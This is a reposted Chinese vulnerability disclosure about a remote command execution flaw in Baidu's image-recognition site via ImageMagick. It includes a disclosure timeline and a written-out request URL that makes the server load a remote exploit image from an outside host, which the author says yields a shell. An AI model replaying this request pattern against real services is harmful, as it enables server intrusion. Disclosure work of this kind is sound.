神刀安全网

漏洞標題: 百度某站远程命令执行漏洞(大陆地区)

漏洞詳情

披露狀態:

2016-05-05: 細節已通知廠商並且等待廠商處理中
2016-05-06: 廠商已經確認,細節僅向廠商公開
2016-05-16: 細節向核心白帽駭客及相關領域專家公開
2016-05-26: 細節向普通白帽駭客公開
2016-06-05: 細節向實習白帽駭客公開
2016-06-20: 細節向公眾公開

大概描述:

Imagick

利用点很多 不要总想着找上传

詳細說明:

在百度识图手机版

http://shitu.baidu.com/

上传图片是不会被Imagick处理,但支持直接用远程图像url进行图像识别出现问题

直接加载远程的exp图片

http://shitu.baidu.com/n/searchpc?queryImageUrl=http%3A%2F%2F115browser.com%2Fexp1.png

直接shell

漏洞驗證:

漏洞標題:  百度某站远程命令执行漏洞(大陆地区)

支持远程读取图像的地方都可能出现问题

修復方案:

版權聲明:轉載請註明來源 数据流@烏雲

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞標題: 百度某站远程命令执行漏洞(大陆地区)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址